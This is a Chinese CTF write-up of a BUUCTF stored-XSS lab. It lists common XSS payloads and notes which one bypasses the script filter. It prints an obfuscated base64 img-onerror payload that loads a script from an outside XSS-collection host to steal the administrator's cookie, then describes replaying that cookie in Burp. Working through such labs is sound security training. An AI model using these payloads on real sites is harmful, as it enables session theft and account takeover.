61,【1】BUUCTF WEB BUU XSS COURSE 11

进入靶场

左边是吐槽,右边是登录,先登录试试

admin 123456

admiin'# 123456

admin"# 123456

不玩了,先去回顾下xss

回顾完就很尴尬了,我居然用SQL的知识去做xss的题

重来

吐槽这里有一个输入框,容易出现存储型xss漏洞

常见的xss payload如下:

<script>alert(1)</script>

"><script>alert(1)</script><"

<img src=# onerror=alert(1)>

<svg onload=alert(1)>

都试试

1,<script>alert(1)</script>

访问的时候什么都没有,失败

2,"><script>alert(1)</script><"

根据以上两次尝试,知script被过滤了

3,<img src=# onerror=alert(1)>

出现弹窗1,注入成功

进入xss测试平台XSS平台-XSS测试网站-仅用于安全免费测试

之前没用过,先注册

登录成功

点击左边的创建项目,随便写一个名称

再点击左边的我的项目,右上角的查看配置代码

复制了这个

<img src=c onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtib2R5LmFwcGVuZENoaWxkKHMpO3Muc3JjPScvL3hzLnBlLzV6Vyc7'))>

但是我的xss平台项目里一直不显示记录(很崩溃啊,想换其他的xss平台,结果都被禁了)

不过得到记录后便会知道backend/admin.php和管理员cookie

出现这个页面是我没改cookie

可是我也不知道cookie呀

改cookie就用BP抓包,发送到重放器,在请求里改

就知道flag了

相关推荐
qq_417695053 分钟前
实战:用OpenCV和Python进行人脸识别
jvm·数据库·python
身如柳絮随风扬3 分钟前
什么是左匹配规则?
数据库·sql·mysql
xinhuanjieyi11 分钟前
ruoyimate导入sql\antflow\bpm_init_db.sql报错
android·数据库·sql
毛骗导演13 分钟前
@tencent-weixin/openclaw-weixin 源码ContextToken 持久化改造:实现微信自定义消息发送能力
前端·架构
爱丽_13 分钟前
Pinia 状态管理:模块化、持久化与“权限联动”落地
java·前端·spring
哈__20 分钟前
从内核阻断 SQL 注入:金仓 KingbaseES SQL 防火墙技术解析与实践
数据库·sql
jiankeljx25 分钟前
mysql之如何获知版本
数据库·mysql
SuperEugene41 分钟前
TypeScript+Vue 实战:告别 any 滥用,统一接口 / Props / 表单类型,实现类型安全|编码语法规范篇
开发语言·前端·javascript·vue.js·安全·typescript
_oP_i1 小时前
SQLBot 系统数据库字段
数据库
我真会写代码1 小时前
Redis高频面试题(含标准答案,覆盖基础+进阶+实战)
数据库·redis·缓存